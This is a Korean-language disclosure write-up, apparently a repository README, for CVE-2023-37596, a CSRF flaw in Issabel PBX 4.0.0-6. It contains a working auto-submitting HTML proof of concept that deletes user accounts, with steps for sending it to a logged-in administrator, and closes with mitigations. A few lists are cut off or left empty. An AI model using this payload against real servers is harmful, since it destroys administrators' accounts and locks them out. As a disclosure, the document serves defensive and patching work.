
CVE-2023-37596은 널리 사용되는 오픈소스 통합 커뮤니케이션 플랫폼인 Issabel PBX 버전 4.0.0-6에서 발견된 사이트 간 요청 위조(CSRF) 취약점입니다.
심각도: 높음 | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
Issabel PBX 4.0.0-6 버전에서 사이트 간 요청 위조(CSRF) 취약점이 발견되었습니다. 사용자 관리 엔드포인트에는 CSRF 보호 기능이 구현되어 있지 않아, 인증되지 않은 원격 공격자가 악성 웹 페이지를 제작하여 인증된 Issabel 관리자가 해당 페이지를 방문하면 시스템에서 모든 사용자 계정을 조용히 삭제할 수 있습니다. 반복적으로 악용하면 모든 관리 사용자를 제거하여 전체 애플리케이션에 접근할 수 없게 만들 수 있습니다.
| 필드 | 값 |
|---|---|
| CVE ID | CVE-2023-37596 |
| 취약점 유형 | 사이트 간 요청 위조(CSRF) |
| CWE | CWE-352 |
| 제품 | Issabel PBX |
| 취약 버전 | 4.0.0-6 |
| 공급업체 홈페이지 | https://www.issabel.org/ |
| 소프트웨어 저장소 | https://github.com/IssabelFoundation/issabelPBX |
| 테스트 환경 | Windows |
| CVE 게시일 | 10/07/2023 |
| 발견자 | Sahil Ojha |
Issabel PBX는 사용자 관리 인터페이스에 대한 상태 변경 요청의 출처를 검증하지 않기 때문에, 성공적인 CSRF 공격을 통해 공격자는 다음을 수행할 수 있습니다:
| 제품 | 영향을 받는 버전 | 상태 |
|---|---|---|
| issabel-pbx | 4.0.0-6 | 취약함 |
공격자는 Issabel PBX 애플리케이션의 사용자 삭제 엔드포인트를 대상으로 하는 위조된 HTTP 요청을 포함한 악성 HTML 페이지를 호스팅합니다. Issabel에 이미 인증된 사용자가 동일한 브라우저에서 악성 페이지를 방문하면 공격이 자동으로(또는 버튼 클릭 시) 트리거됩니다. 브라우저는 모든 요청에 피해자의 세션 쿠키를 자동으로 포함하므로, 서버는 위조된 삭제 요청을 정당한 요청으로 수락합니다.
공격자 측에는 특별한 권한이 필요하지 않습니다 — 인증된 관리자를 조작된 페이지로 유인하기 위한 사회공학적 벡터(피싱 링크, 악성 광고 등)만 있으면 됩니다.
이 공격의 주요 특징:
id=1, id=2, …)는 페이로드를 수정하여 공격 대상으로 삼을 수 있습니다.Issabel PBX 사용자 목록 페이지로 이동하여 관리자 자격 증명으로 인증합니다:
https://<Issabel-IP>/index.php?menu=userlist


Burp Suite는 아래와 유사한 HTML 페이지를 생성합니다. 이를 .html 파일(예: csrf_exploit.html)로 저장합니다:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit the form as soon as the page loads
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
참고:
<Issabel-IP>를 대상 서버의 IP 주소 또는 호스트 이름으로 바꾸고, 다른 사용자 계정을 대상으로 하려면id값을 조정하세요.
csrf_exploit.html 파일(또는 호스팅된 위치의 링크)을 현재 Issabel PBX에 로그인된 사용자에게 전송합니다. 피해자가 페이지를 열면 양식이 자동으로 제출되어 확인 프롬프트 없이 대상 사용자가 삭제됩니다.


이 취약점을 해결하기 위해 공급업체 및/또는 시스템 관리자는 다음 방어 조치를 적용해야 합니다:
CSRF 토큰 구현 — 모든 상태 변경 요청에 대해 암호학적으로 무작위한 세션별(또는 요청별) 토큰을 생성하고 서버 측에서 검증합니다. 유효한 토큰이 없는 요청은 거부해야 합니다.
SameSite 쿠키 속성 — 세션 쿠키의 SameSite 속성을 Strict 또는 Lax로 설정하여 대부분의 브라우저에서 교차 출처 요청이 세션 쿠키를 포함하지 못하게 합니다.
Origin / Referer 헤더 검증 — 서버 측에서 Origin 또는 Referer 헤더가 애플리케이션 자체 도메인과 일치하지 않는 모든 상태 변경 요청을 거부합니다.
파괴적 작업에 대한 재인증 요구 — 사용자 계정 삭제와 같은 되돌릴 수 없는 작업을 처리하기 전에 사용자에게 비밀번호를 다시 입력하도록 요청합니다.
최소 권한 원칙 적용 — 명시적인 관리자 역할을 가진 사용자만 사용자 삭제 기능에 접근할 수 있도록 하여 성공적인 공격의 피해 범위를 줄입니다.
공급업체 패치가 제공될 때까지 관리자는 다음을 권장합니다:
| 날짜 | 이벤트 |
|---|---|
| 10/07/2023 | 취약점 발견 및 보고 |
| 10/07/2023 | CVE-2023-37596 지정 |
Sahil Ojha
면책 조항: 이 저장소는 교육 및 책임 있는 공개 목적으로만 게시됩니다. 여기에 제공된 정보는 시스템 소유자의 명시적인 서면 허가 없이 시스템을 공격하는 데 사용되어서는 안 됩니다. 작성자는 이 정보의 오용에 대해 어떠한 책임도 지지 않습니다.